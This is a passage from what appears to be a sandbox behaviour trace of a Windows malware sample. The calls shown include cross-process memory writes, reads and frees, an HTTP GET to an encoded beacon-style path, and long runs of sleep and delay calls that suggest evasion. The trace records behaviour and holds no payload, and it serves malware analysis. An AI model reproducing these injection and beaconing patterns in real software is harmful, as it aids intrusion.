lpBaseAddress=0x500000, lpBuffer=0x32e407b0*, nSize=0x58, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0x32e407b0*, lpNumberOfBytesWritten=0xcdab8*=0x58) returned 1 [0190.407] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdb00*, nSize=0xd8, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0xcdb00*, lpNumberOfBytesWritten=0xcdab8*=0xd8) returned 1 [0190.407] ResetEvent (hEvent=0x640) returned 1 [0190.407] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0190.416] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdb00, nSize=0xd8, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdb00*, lpNumberOfBytesRead=0xcdab8*=0xd8) returned 1 [0190.416] VirtualFreeEx (hProcess=0x730, lpAddress=0x500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.416] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0190.416] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4e0000, lpBuffer=0xcdda0, nSize=0x80, lpNumberOfBytesRead=0xcdc08 | out: lpBuffer=0xcdda0*, lpNumberOfBytesRead=0xcdc08*=0x80) returned 1 [0190.416] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4d0000, lpBuffer=0xcde20, nSize=0x400, lpNumberOfBytesRead=0xcdc08 | out: lpBuffer=0xcde20*, lpNumberOfBytesRead=0xcdc08*=0x400) returned 1 [0190.416] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x4f0008, lpBuffer=0xcdcd0, nSize=0x4, lpNumberOfBytesRead=0xcdc08 | out: lpBuffer=0xcdcd0*, lpNumberOfBytesRead=0xcdc08*=0x4) returned 1 [0190.417] VirtualFreeEx (hProcess=0x730, lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.417] VirtualFreeEx (hProcess=0x730, lpAddress=0x4e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.417] VirtualFreeEx (hProcess=0x730, lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.417] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.417] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803c00 | out: hHeap=0x2150000) returned 1 [0190.417] VirtualFreeEx (hProcess=0x730, lpAddress=0x4b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.417] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80cb0 | out: hHeap=0x2150000) returned 1 [0190.418] WinHttpCloseHandle (hInternet=0x3396aa10) returned 1 [0190.418] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/10/62/1381892/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396cbd0 [0190.418] WinHttpSetOption (hInternet=0x3396cbd0, dwOption=0x1f, lpBuffer=0xce188, dwBufferLength=0x4) returned 1 [0190.418] WinHttpSendRequest (hRequest=0x3396cbd0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) Thread: id = 5 os_tid = 0x9dc Thread: id = 6 os_tid = 0x9fc [0088.127] Sleep (dwMilliseconds=0x3e8) [0089.131] Sleep (dwMilliseconds=0x3e8) [0090.166] Sleep (dwMilliseconds=0x3e8) [0091.201] Sleep (dwMilliseconds=0x3e8) [0092.203] Sleep (dwMilliseconds=0x3e8) [0093.251] Sleep (dwMilliseconds=0x3e8) [0094.358] Sleep (dwMilliseconds=0x3e8) [0095.362] Sleep (dwMilliseconds=0x3e8) [0096.379] Sleep (dwMilliseconds=0x3e8) [0097.382] Sleep (dwMilliseconds=0x3e8) [0098.489] Sleep (dwMilliseconds=0x3e8) [0099.740] Sleep (dwMilliseconds=0x3e8) [0100.939] Sleep (dwMilliseconds=0x3e8) [0103.789] Sleep (dwMilliseconds=0x3e8) [0105.333] Sleep (dwMilliseconds=0x3e8) [0106.356] Sleep (dwMilliseconds=0x3e8) [0107.381] Sleep (dwMilliseconds=0x3e8) [0108.406] Sleep (dwMilliseconds=0x3e8) [0109.419] Sleep (dwMilliseconds=0x3e8) [0110.467] Sleep (dwMilliseconds=0x3e8) [0111.477] Sleep (dwMilliseconds=0x3e8) [0111.566] Sleep (dwMilliseconds=0x3e8) [0111.604] Sleep (dwMilliseconds=0x3e8) [0111.664] Sleep (dwMilliseconds=0x3e8) [0111.700] Sleep (dwMilliseconds=0x3e8) [0111.745] Sleep (dwMilliseconds=0x3e8) [0111.784] Sleep (dwMilliseconds=0x3e8) [0111.821] Sleep (dwMilliseconds=0x3e8) [0111.860] Sleep (dwMilliseconds=0x3e8) [0111.898] Sleep (dwMilliseconds=0x3e8) [0111.935] Sleep (dwMilliseconds=0x3e8) [0111.976] Sleep (dwMilliseconds=0x3e8) [0112.017] Sleep (dwMilliseconds=0x3e8) [0112.054] Sleep (dwMilliseconds=0x3e8) [0112.099] Sleep (dwMilliseconds=0x3e8) [0112.135] Sleep (dwMilliseconds=0x3e8) [0112.173] Sleep (dwMilliseconds=0x3e8) [0112.232] Sleep (dwMilliseconds=0x3e8) [0112.272] Sleep (dwMilliseconds=0x3e8) [0112.315] Sleep (dwMilliseconds=0x3e8) [0112.363] Sleep (dwMilliseconds=0x3e8) [0112.406] Sleep (dwMilliseconds=0x3e8) [0112.460] Sleep (dwMilliseconds=0x3e8) [0112.508] Sleep (dwMilliseconds=0x3e8) [0112.562] Sleep (dwMilliseconds=0x3e8) [0112.604] Sleep (dwMilliseconds=0x3e8) [0112.660] Sleep (dwMilliseconds=0x3e8) [0112.698] Sleep (dwMilliseconds=0x3e8) [0112.742] Sleep (dwMilliseconds=0x3e8) [0112.783] Sleep (dwMilliseconds=0x3e8) [0112.823] Sleep (dwMilliseconds=0x3e8) [0112.859] Sleep (dwMilliseconds=0x3e8) [0112.903] Sleep (dwMilliseconds=0x3e8) [0112.939] Sleep (dwMilliseconds=0x3e8) [0112.984] Sleep (dwMilliseconds=0x3e8) [0113.022] Sleep (dwMilliseconds=0x3e8) [0113.036] Sleep (dwMilliseconds=0x3e8) [0113.071] Sleep (dwMilliseconds=0x3e8) [0113.117] Sleep (dwMilliseconds=0x3e8) [0113.155] Sleep (dwMilliseconds=0x3e8) [0113.196] Sleep (dwMilliseconds=0x3e8) [0113.233] Sleep (dwMilliseconds=0x3e8) [0113.268] Sleep (dwMilliseconds=0x3e8) [0113.306] Sleep (dwMilliseconds=0x3e8) [0113.342] Sleep (dwMilliseconds=0x3e8) [0113.386] Sleep (dwMilliseconds=0x3e8) [0113.423] Sleep (dwMilliseconds=0x3e8) [0113.458] Sleep (dwMilliseconds=0x3e8) [0113.495] Sleep (dwMilliseconds=0x3e8) [0113.532] Sleep (dwMilliseconds=0x3e8) [0113.706] Sleep (dwMilliseconds=0x3e8) [0113.751] Sleep (dwMilliseconds=0x3e8) [0113.787] Sleep (dwMilliseconds=0x3e8) [0113.823] Sleep (dwMilliseconds=0x3e8) [0113.860] Sleep (dwMilliseconds=0x3e8) [0113.900] Sleep (dwMilliseconds=0x3e8) [0113.945] Sleep (dwMilliseconds=0x3e8) [0113.995] Sleep (dwMilliseconds=0x3e8) [0114.032] Sleep (dwMilliseconds=0x3e8) [0114.075] Sleep (dwMilliseconds=0x3e8) [0114.112] Sleep (dwMilliseconds=0x3e8) [0114.148] Sleep (dwMilliseconds=0x3e8) [0114.183] Sleep (dwMilliseconds=0x3e8) [0114.221] Sleep (dwMilliseconds=0x3e8) [0114.261] Sleep (dwMilliseconds=0x3e8) [0114.311] Sleep (dwMilliseconds=0x3e8) [0114.354] Sleep (dwMilliseconds=0x3e8) [0114.429] Sleep (dwMilliseconds=0x3e8) [0114.514] Sleep (dwMilliseconds=0x3e8) [0114.549] Sleep (dwMilliseconds=0x3e8) [0114.589] Sleep (dwMilliseconds=0x3e8) [0114.613] Sleep (dwMilliseconds=0x3e8) [0114.662] Sleep (dwMilliseconds=0x3e8) [0114.679] Sleep (dwMilliseconds=0x3e8) [0114.700] Sleep (dwMilliseconds=0x3e8) [0114.740] Sleep (dwMilliseconds=0x3e8) [0114.869] Sleep (dwMilliseconds=0x3e8) [0115.251] Sleep (dwMilliseconds=0x3e8) [0115.485] Sleep (dwMilliseconds=0x3e8) [0115.519] Sleep (dwMilliseconds=0x3e8) [0115.524] Sleep (dwMilliseconds=0x3e8) [0115.539] Sleep (dwMilliseconds=0x3e8) [0115.558] Sleep (dwMilliseconds=0x3e8) [0115.564] Sleep (dwMilliseconds=0x3e8) [0115.575] Sleep (dwMilliseconds=0x3e8) [0115.579] Sleep (dwMilliseconds=0x3e8) [0115.584] Sleep (dwMilliseconds=0x3e8) [0115.586] Sleep (dwMilliseconds=0x3e8) [0115.591] Sleep (dwMilliseconds=0x3e8) [0115.594] Sleep (dwMilliseconds=0x3e8) [0115.598] Sleep (dwMilliseconds=0x3e8) [0115.601] Sleep (dwMilliseconds=0x3e8) [0115.606] Sleep (dwMilliseconds=0x3e8) [0115.608] Sleep (dwMilliseconds=0x3e8) [0115.611] Sleep (dwMilliseconds=0x3e8) [0115.613] Sleep (dwMilliseconds=0x3e8) [0115.615] Sleep (dwMilliseconds=0x3e8) [0115.619] Sleep (dwMilliseconds=0x3e8) [0115.620] Sleep (dwMilliseconds=0x3e8) [0115.626] Sleep (dwMilliseconds=0x3e8) [0115.629] Sleep (dwMilliseconds=0x3e8) [0115.632] Sleep (dwMilliseconds=0x3e8) [0115.634] Sleep (dwMilliseconds=0x3e8) [0115.636] Sleep (dwMilliseconds=0x3e8) [0115.643] Sleep (dwMilliseconds=0x3e8) [0115.644] Sleep (dwMilliseconds=0x3e8) [0115.646] Sleep (dwMilliseconds=0x3e8) [0115.647] Sleep (dwMilliseconds=0x3e8) [0115.649] Sleep (dwMilliseconds=0x3e8) [0115.651] Sleep (dwMilliseconds=0x3e8) [0115.701] Sleep (dwMilliseconds=0x3e8) [0115.745] Sleep (dwMilliseconds=0x3e8) [0115.778] Sleep (dwMilliseconds=0x3e8) [0115.812] Sleep (dwMilliseconds=0x3e8) [0115.846] Sleep (dwMilliseconds=0x3e8) [0115.881] Sleep (dwMilliseconds=0x3e8) [0115.916] Sleep (dwMilliseconds=0x3e8) [0115.949] Sleep (dwMilliseconds=0x3e8) [0115.982] Sleep (dwMilliseconds=0x3e8) [0116.016] Sleep (dwMilliseconds=0x3e8) [0116.051] Sleep (dwMilliseconds=0x3e8) [0116.085] Sleep (dwMilliseconds=0x3e8) [0116.151] Sleep (dwMilliseconds=0x3e8) [0116.185] Sleep (dwMilliseconds=0x3e8) [0116.218] Sleep (dwMilliseconds=0x3e8) [0116.253] Sleep (dwMilliseconds=0x3e8) [0116.302] Sleep (dwMilliseconds=0x3e8) [0116.336] Sleep (dwMilliseconds=0x3e8) [0116.373] Sleep (dwMilliseconds=0x3e8) [0116.408] Sleep (dwMilliseconds=0x3e8) [0116.442] Sleep (dwMilliseconds=0x3e8) [0116.476] Sleep (dwMilliseconds=0x3e8) [0116.509] Sleep (dwMilliseconds=0x3e8) [0116.544] Sleep (dwMilliseconds=0x3e8) [0116.588] Sleep (dwMilliseconds=0x3e8) [0116.650] Sleep (dwMilliseconds=0x3e8) [0116.694] Sleep (dwMilliseconds=0x3e8) [0116.728] Sleep (dwMilliseconds=0x3e8) [0116.769] Sleep (dwMilliseconds=0x3e8) [0116.803] Sleep (dwMilliseconds=0x3e8) [0116.837] Sleep (dwMilliseconds=0x3e8) [0116.871] Sleep (dwMilliseconds=0x3e8) [0116.905] Sleep (dwMilliseconds=0x3e8) [0116.938] Sleep (dwMilliseconds=0x3e8) [0116.972] Sleep (dwMilliseconds=0x3e8) [0117.005] Sleep (dwMilliseconds=0x3e8) [0117.040] Sleep (dwMilliseconds=0x3e8) [0117.078] Sleep (dwMilliseconds=0x3e8) [0117.135] Sleep (dwMilliseconds=0x3e8) [0117.172] Sleep (dwMilliseconds=0x3e8) [0117.205] Sleep (dwMilliseconds=0x3e8) [0117.238] Sleep (dwMilliseconds=0x3e8) [0117.271] Sleep (dwMilliseconds=0x3e8) [0117.305] Sleep (dwMilliseconds=0x3e8) [0117.339] Sleep (dwMilliseconds=0x3e8) [0117.378] Sleep (dwMilliseconds=0x3e8) [0117.411] Sleep (dwMilliseconds=0x3e8) [0117.451] Sleep (dwMilliseconds=0x3e8) [0117.499] Sleep (dwMilliseconds=0x3e8) [0117.540] Sleep (dwMilliseconds=0x3e8) [0117.574] Sleep (dwMilliseconds=0x3e8) [0117.609] Sleep (dwMilliseconds=0x3e8) [0117.666] Sleep (dwMilliseconds=0x3e8) [0117.704] Sleep (dwMilliseconds=0x3e8) [0117.744] Sleep (dwMilliseconds=0x3e8) [0117.778] Sleep (dwMilliseconds=0x3e8) [0117.812] Sleep (dwMilliseconds=0x3e8) [0117.846] Sleep (dwMilliseconds=0x3e8) [0118.476] Sleep (dwMilliseconds=0x3e8) [0119.131] Sleep (dwMilliseconds=0x3e8) [0119.165] Sleep (dwMilliseconds=0x3e8) [0119.167] Sleep (dwMilliseconds=0x3e8) [0119.206] Sleep (dwMilliseconds=0x3e8) [0119.245] Sleep (dwMilliseconds=0x3e8) [0119.302] Sleep (dwMilliseconds=0x3e8) [0119.351] Sleep (dwMilliseconds=0x3e8) [0119.393] Sleep (dwMilliseconds=0x3e8) [0119.427] Sleep (dwMilliseconds=0x3e8) [0119.438] Sleep (dwMilliseconds=0x3e8) [0119.440] Sleep (dwMilliseconds=0x3e8) [0119.485] Sleep (dwMilliseconds=0x3e8) [0119.500] Sleep (dwMilliseconds=0x3e8) [0119.539] Sleep (dwMilliseconds=0x3e8) [0119.572] Sleep (dwMilliseconds=0x3e8) [0119.610] Sleep (dwMilliseconds=0x3e8) [0119.643] Sleep (dwMilliseconds=0x3e8) [0119.676] Sleep (dwMilliseconds=0x3e8) [0119.710] Sleep (dwMilliseconds=0x3e8) [0119.744] Sleep (dwMilliseconds=0x3e8) [0119.778] Sleep (dwMilliseconds=0x3e8) [0119.812] Sleep (dwMilliseconds=0x3e8) [0119.834] Sleep (dwMilliseconds=0x3e8) [0119.837] Sleep (dwMilliseconds=0x3e8) [0119.866] Sleep (dwMilliseconds=0x3e8) [0119.883] Sleep (dwMilliseconds=0x3e8) [0119.886] Sleep (dwMilliseconds=0x3e8) [0119.890] Sleep (dwMilliseconds=0x3e8) [0120.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.946] NtDelayExecution 